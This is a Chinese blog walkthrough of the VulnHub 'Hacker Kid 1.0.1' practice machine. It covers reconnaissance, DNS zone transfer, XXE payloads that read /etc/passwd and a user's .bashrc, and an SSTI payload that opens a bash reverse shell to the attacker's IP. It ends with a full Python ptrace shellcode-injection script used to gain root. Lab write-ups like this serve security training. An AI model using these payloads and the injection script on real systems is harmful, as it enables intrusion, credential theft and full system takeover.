HACKER KID: 1.0.1实战演练

已于 2023-05-30 21:51:39 修改
阅读量741 收藏
点赞数
分类专栏: vulnhub 文章标签: 服务器 apache 运维
于 2023-05-30 21:09:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/130957014
版权

文章目录

HACKER KID: 1.0.1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/hacker-kid-101,719/

设备名称IP地址
攻击机:kali192.168.0.109
靶机:Hacker kid: 1.0.1192.168.0.103
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.0.103

//开放DNS:53端口、WEB:80端口、9999端口
//DNS:53端口版本号ISC BIND 9.16.1
//WEB:80端口中间件为Apache-httpd 2.4.41
//MySQL:3306端口版本号为Tornado httpd 6.1

在这里插入图片描述

2、访问网站
http://192.168.0.103/

翻译为:
你给我起了一个“臭名昭著的黑客”的名字!!就因为我黑了你的整个服务器。
现在我可以访问你的整个服务器了。如果你足够聪明,可以取回它,就给我看看。
“你越挖我,你就会在你的服务器上找到我。挖我…挖我更多”

在这里插入图片描述

http://192.168.0.103/index.html

//无法访问,返回404

在这里插入图片描述

http://192.168.0.103/#app.html

//发现出现一个#符号,页面没有变化

在这里插入图片描述

http://192.168.0.103/app.html

//功能没法使用

在这里插入图片描述

http://192.168.0.103/#form.html

//发现出现一个#符号,页面没有变化

在这里插入图片描述

http://192.168.0.103/form.html

在这里插入图片描述

3、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.0.103

在这里插入图片描述

4、查看源码
view-source:http://192.168.0.103/index.php

//使用GET提交page_no请求新的页面

在这里插入图片描述

5、请求参数
http://192.168.0.103/index.php?page_no=1

//有回显,批量测试

在这里插入图片描述

6、burpsuite批量请求

在这里插入图片描述

在这里插入图片描述

//原文为:
Okay so you want me to speak something ?
I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!
Out of my many homes...one such home..one such home for me : hackers.blackhat.local
//翻译为:
好吧,你想让我说点什么?
我是一个黑客孩子,而不是一个愚蠢的黑客。所以我创建了一些子域,以便随时返回服务器!!
在我的许多家里。。。一个这样的家。。对我来说就是这样一个家:hackers.blackhat.local

在这里插入图片描述

7、编辑hosts文件
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts 

//添加192.168.0.103   hackers.blackhat.local

在这里插入图片描述

8、DNS区域传输
┌──(kali㉿kali)-[~]
└─$ dig axfr @192.168.0.103 blackhat.local

在这里插入图片描述

9、编辑hosts
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts

在这里插入图片描述

10、访问网站
http://hackerkid.blackhat.local/

//发现一个注册界面

在这里插入图片描述

11、注册账号
//提示邮箱错误

在这里插入图片描述

12、burpsuite抓包
//发现是XML传输数据的

在这里插入图片描述

13、XML注入
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root>
    <name>kali</name>
    <tel>13911111111</tel>
    <email>&xxe;</email>
    <password>123456</password>
</root>

在这里插入图片描述

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY  xxe  SYSTEM   "php://filter/convert.base64-encode/resource=/home/saket/.bashrc"  >]>   
<root>
    <name>kali</name>
    <tel>13911111111</tel>
    <email>&xxe;</email>
    <password>123456</password>
</root>

在这里插入图片描述

14、解密
//账号:admin
//密码:Saket!#$%@!!

在这里插入图片描述

15、登录网站的9999端口
http://192.168.0.103:9999/login?next=%2F

//账号:saket,密码:Saket!#$%@!!
//原文为:
Tell me your name buddy
How can i get to know who are you ??
//翻译为:
告诉我你的名字,伙计
我怎么才能知道你是谁??

在这里插入图片描述

在这里插入图片描述

16、提交参数
//编码前:
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.0.109/4444 0>&1"')}}
//编码后:
%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F4444%200%3E%261%22')%7D%7D

在这里插入图片描述

17、监听
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444

在这里插入图片描述

三、提权
1、查找具有Capabilities特殊操作权限的程序
saket@ubuntu:~$ /usr/sbin/getcap -r / 2>/dev/null

在这里插入图片描述

2、创建源码文件
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c 
 
import ctypes
import sys
import struct
 
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
 
PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17
 
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
 
class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]
 
libc = ctypes.CDLL("libc.so.6")
 
pid=int(sys.argv[1])
 
# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
 
# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
 
# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
 
print("Instruction Pointer: " + hex(registers.rip))
 
print("Injecting Shellcode at: " + hex(registers.rip))
 
# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
 
# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
 
  # Convert the byte to little endian.
  shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
  shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
  shellcode_byte=int(shellcode_byte_little_endian,16)
 
  # Inject the byte.
  libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
 
print("Shellcode Injected!!")
 
# Modify the instuction pointer
registers.rip=registers.rip+2
 
# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
 
print("Final Instruction Pointer: " + hex(registers.rip))
 
# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
3、开机本地开启http服务
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080

在这里插入图片描述

4、下载脚本
saket@ubuntu:~$ wget http://192.168.0.109:8080/inject.py

在这里插入图片描述

5、查看以root运行的进程
saket@ubuntu:~$ ps -aef | grep root

在这里插入图片描述

6、执行脚本
saket@ubuntu:~$ python2.7 inject.py 670

在这里插入图片描述

7、查看端口是否开放
saket@ubuntu:~$ netstat -ano | grep 5600

//如果端口没打开,可以重新选择进程号

在这里插入图片描述

8、连接端口
┌──(kali㉿kali)-[~]
└─$ nc 192.168.0.103 5600

在这里插入图片描述

liebe1*1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hackerrank:Hackerrank测试解决方案
04-27
在IT行业中,编程竞赛和在线评判平台如HackerRank扮演着重要的角色,它们为程序员提供了一个展示技能、学习新知识和提升算法理解的平台。"HackerRank测试解决方案"主要涉及的是利用Java语言来解决HackerRank上的各种...
hackerrank:我的Hackerrank解决方案集合
05-12
【标题】"Hackerrank: 我的Hackerrank解决方案集合" 在编程世界中,HackerRank是一个广受欢迎的在线平台,它提供了丰富的编程挑战,旨在帮助开发者提升技能,准备面试,并参与到全球的编码竞赛中。这个“我的Hacker...
vulnhub之Hacker_Kid-v1.0.1
qwweggfe的博客
08-23 891
kali:192.168.181.129 靶机:192.168.181.154 首先进行ip扫描
Hacker_kid-v1.0.1(vulnhub)
wcl20010的博客
05-07 1621
中等难度的靶机,取得权限即可(提示:信息收集,不需要爆破) 此靶机存在的都是新兴的漏洞类型。 地址如下: https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova 1.主机发现 arp-scan -l 2.端口发现 nmap -p 1-65535 -A 192.168.56.106 详细信息如下: 53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux) | dns-nsid:
Vulnhub靶机:HACKER KID_ 1.0.1
LainWith的博客
07-17 908
系列Hackerkid(此系列共1台)发布日期2021年08月02日**难度等级**低→中**打靶目标**取得root权限**提示信息**OSCP样式的靶机(专注于信息收集,不要爆破,每一步都有适当提示)https主机发现端口扫描WEB信息收集DNS区域传输XXE注入攻击PHP封装器SSTI模板注入Capabilitie提权httpshttpshttpshttpshttpshttpshttpshttpshttpshttps。...
Vulnhub-Hacker kid: 1.0.1渗透
laoyanCZ的博客
12-12 1029
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
VnlnHub Hacker_Kid-v1.0.1
weixin_45682839的博客
09-09 294
VnlnHub Hacker_Kid-v1.0.1靶机通关攻略记录,涉及知识包括:端口服务探测、WEB信息搜集、url参数值爆破、DNS区域传输、XXE注入攻击、PHP封装器、SSTI模板注入、Capabilitie提权
Hackerrank:Hackerrank.com的简历
03-29
这个"Hackerrank-main"可能是用户在解决HackerRank挑战时创建的一个项目文件夹,包含了与HackerRank挑战相关的代码、解决方案和其他资源。通常,这样的文件夹会包含一个或多个C#源代码文件(如".cs"),用于实现特定...
hackerrank:Hack来自Hackerrank平台的Katas
03-06
在本主题中,我们将深入探讨"hackerrank:Hack来自Hackerrank平台的Katas"这一概念,以及它与JavaScript编程语言的关系。Hackerrank是一个知名的在线编程挑战平台,为开发者提供各种技能测试和练习,以提升他们的编程...
hackerrank:MVW的一些Hackerrank解决方案
04-29
在本压缩包“hackerrank-master”中,我们聚焦于HackerRank平台上的Erlang编程挑战解决方案。HackerRank是一个在线平台,它为程序员提供了一系列的编程挑战,旨在提升和测试他们的技能,同时帮助他们准备技术面试。...
vulnhub靶场-Hacker_Kid-v1.0.1
qq_42947816的博客
06-27 1631
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Hacker_Kid-v1.0.1靶机
weixin_45691672的博客
06-16 1006
实验主机:Hacker_Kid-v1.0.1靶机一台/Kali linux攻击机一台Hacker_Kid-v1.0.1靶机 IP:192.168.3.225Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
靶机渗透练习19-Hacker kid
hirak0的博客
04-16 736
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacker-kid-101,719/ Description Difficulty: Easy/Medium (Intermediate) This box is OSCP style and focused on enumeration with easy exploitation.The goal is to get root.No guessing or heavy bruteforce is required a
vulnhub靶场——Hacker-Kid-v1-0-1
Czheisenberg的博客
03-03 6989
vulnhub靶场——Hacker-Kid-v1-0-1 WP
HACKER KID: 1.0.1靶机】
qq_40646572的博客
05-23 1748
信息搜集 开启靶机。 使用nmap扫描,发现存活靶机,192.168.85.145,靶机开放端口为53,80,9999。 进一步搜集下对应段开启的服务。 发现,9999端口开启的是tornado服务。 先打开web网站,看下。 好像再提示挖掘?还是使用dig工具?先放下,继续搜集信息。 #app.html页面源码,发现存在提示,给了一个参数。这个参数应该是页面数,先尝试下。 发现page_no=21时,返回数据不同。 提示我们这个网站还绑定了一个域名,先添加到/etc/hosts文本中。
Hacker_kid靶机打靶过程及思路
qq_52610024的博客
04-25 1686
下载利用权限利用的python进程注入脚本wgethttps//gist.githubusercontent.com/wifisecguy/1d69839fe55c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py。7.挨个读取后,在读取/home/saket/.bashrc时没有回显,使用php封装器读取,然后进行解码。,发现得到用户名和密码,在登录处登录失效,尝试使用saket作为用户名登录。...
并发服务器
最新发布
m0_71459026的博客
08-27 282
1.阻塞IO:fgets、scanf、read、recv、getchar。实现步骤:获取原文件描述符的属性->增加非阻塞属性->设置新属性。1.单循环服务器:同一时刻,只能处理一个客户端的任务;2.并发服务器:同一时刻,可以处理多个客户端的任务;:文件描述符,指向要进行操作的打开文件的描述符。(1)异步通知的IO方式,节省CPU;(1)实现多个IO同步的效果。,则它是要设置的值;(1)多个IO复用一个进程;(1)使用轮询的方法实现。(2)只能监测少量IO;(2)cpu占有率低。(2)cpu占有率高。
何为大模型服务器?如何明智地挑选?
HPC_Evan的博客
08-27 1143
拥有完备的 CUDA 环境、丰富多样的应用软件,如 TensorFlow、Pytorch 等,能够满足不同类型的模型训练需求,还有强大实用的函数库以及稳定可靠的 Ubuntu 22.04 LTS 64 位服务器版操作系统。对于企业而言,无论是优化生产流程的预测模型训练,还是提升客户体验的个性化推荐系统开发,这两款机型都能凭借出色的性能和稳定的运行,为企业节省时间和成本,提高市场竞争力。它们所具备的完善的软件和硬件配置,就像是为您精心打造的一把利剑,助您在大模型训练的道路上披荆斩棘,勇往直前。
高防服务器中的流量清洗是什么意思?
wanhengwangluo的博客
08-27 321
高防服务器能够为企业防御一定的网络攻击,是网络游戏行业经常会选择的一款服务器类型,其中高防服务器的流量清洗则是指对服务器所接收的流量进行实时监测、识别和过滤,将恶意流量与攻击流量进行清除,保证网络能够正常运行。高防服务器还有着强大的并发处理能力,可以同时处理大量的流量请求,以此来保障网络服务的稳定性。当发现异常的流量或者是攻击行为,高防服务器能够做出实时响应,采取相应的防御措施,根据实际情况与攻击的趋势,及时调整流量过滤策略,提高防护效果,保障网络的安全。接下来我们就来探讨一下高防服务器中的流量清洗吧!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值